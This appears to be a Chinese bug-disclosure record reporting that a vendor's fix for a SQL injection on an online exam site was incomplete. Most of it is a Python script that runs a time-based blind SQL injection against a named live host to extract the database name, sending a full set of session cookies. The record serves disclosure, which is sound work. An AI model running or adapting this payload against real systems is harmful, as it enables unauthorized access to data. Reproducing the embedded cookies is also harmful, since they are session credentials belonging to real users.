2015-12-02: 细节已通知厂商并且等待厂商处理中 2015-12-07: 厂商已经确认,细节仅向厂商公开 2015-12-17: 细节向核心白帽子及相关领域专家公开 2015-12-27: 细节向普通白帽子公开 2016-01-06: 细节向实习白帽子公开 2016-01-17: 细节向公众公开
修复不当：修复后 sqlmap 的确跑不出来了，但注入点本身并未根除，下面这段手工构造的时间盲注仍然能取出数据库用户名。sleep 时间请自行调整，否则服务很容易就 504 了。-----------[Done]MySQL user is mbaexam-----------
import httplibimport timeimport urllibimport urllib2import sysimport randomfrom time import sleeppayloads = list('dedmbacxsehverabcdefghijklmnopqrstuvwxyz@_.0123456789')base_url = "/ucenter/exam/getQuesList"database = ''def sql(): post_data={"num":"15","PaperID":"92","title":"%E9%97%AE%E9%A2%98%E6%B1%82%E8%A7%A3","type":"radio","quesids":"a"} for i in range(1,10): for payload in payloads: sleep(10) data2 = "(select(0)from(select(sleep(ascii(mid(database(),%d,1))-%d)))x)" % (i,ord(payload)) post_data["quesids"] = data2 data=urllib.urlencode(post_data) headers = {"User-agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21", "Accept": "*/*", "Referer": "ks.mbachina.com", "Content-Length":"143", "X-Requested-With": "XMLHttpRequest", "Accept-Encoding" : "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "keep-alive", "Host": "ks.mbachina.com", "Cookie":"_sid=f160eb804c57e011dcc5160e61b5adf3410b599d; _i=%2Fx4a8qmEWqzWf0JVfZb4LbnexT5SGeS%2FYLiDG3NBdAR%2Bo2wSHJLVTA%3D%3D_df54f676c3d4530776ae5b86bc275047_1446692677; _l=1446692494; _178c=36281005%23%23testby; _e=31536000; CNZZDATA30044938=cnzz_eid%3D757341134-1446690162-http%253A%252F%252Faccount.178.com%252F%26ntime%3D1446690162; lzstat_uv=2440368293235315611|3; lzstat_ss=712204841_6_1447188375_3; lstat_bc=1514100093928880260; 6c3ae_lastpos=other; 6c3ae_ck_info=%2F%09; 6c3ae_winduser=VVMEAgIDCTECBlQOXwVVAQNRVwYJVlFVCQEKCAcHWFdQAgQAVVNTVD0%3D; _ystat_style=grey; ali_apache_id=182.92.253.28.1447213753471.996202.8; xman_us_f=x_l=1&x_locale=en_US&no_popup_today=n&x_user=US|cena|john|ifm|744887430&last_popup_time=1447222793563; intl_locale=en_US; aep_usuc_f=site=glo®ion=CN&b_locale=en_US&isb=y&isfm=y&c_tp=USD®_ver=new; xman_t=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; acs_usuc_t=acs_rt=1ca442554e664f4e95f51dea19820746; intl_common_forever=vS/UslZJX1ujWRRwfsCPfl20zxquyCDw5yQboXfI9OtkQoToTKqo1g==; 
xman_f=wEVqhH+b+eAR46kvyKARt/oHftT2h6y5ipD+6sjZ9GYmr/Tr+EkQAo+WaYFtZbSHlyqVnNAMvg3VUUBmgidINn2hE/MRdTNR5jJV94TZSQWL2AWP4rwgfVCw4MrcqKyozdB5IjA1FfDv6jYbWh2bfP+5Mjd8EGClZJWA4cDkCC8R4v29HJV/7liC+/CxQhNeT1bG3SiTdQxihGRPrSo6Jktbb5F9UUSMMnuVuBwzqiYTw6JMdkMf+2E2GW67Z6iIGly7gh/1LJ6oqYfD0QVEunnDVY2a3WsxAS/e4NdfJagYx48P3GD2l2oRBYLFcq7XJCFrudnvut2KlHYXT/yGvL5AVLKIxPQFW+Gu1SLwX9W9KhNwvexJnhK40QRBCargRNYYKEvba0g=; ali_beacon_id=182.92.253.28.1447213753471.996202.8; cna=qlA/DuKa3k0CAbZc/RwKyHZQ; __utma=3375712.381681950.1447213757.1447213757.1447222530.2; __utmc=3375712; __utmz=3375712.1447213757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); l=AiwseRMhzL09SxTDNl0-hfWi3AFeVdCP; ali_apache_track=mt=1|ms=|mid=us1125640758ctnk; ali_apache_tracktmp=W_signed=Y; PHPSESSID=90577438460ab02245f9bfdff6d68c7b; CNZZDATA1408427=cnzz_eid%3D288945677-1448603092-http%253A%252F%252Fwww.qq.com%252F%26ntime%3D1448603092"} try: now_time = time.time() conn = httplib.HTTPConnection("ks.mbachina.com",timeout=5) conn.request('POST', base_url, data, headers) data3 = conn.getresponse().read() except: print ".", if time.time() - now_time < 1: global database database += payload print '\r[In Progress]' + database else: print ".",if __name__ == "__main__": sql() print '\n[Done]MySQL user is ' + database
危害等级:低
漏洞Rank:4
确认时间:2015-12-07 18:52
非常感谢您，问题已着手处理，感谢您对我们安全工作的关注。
暂无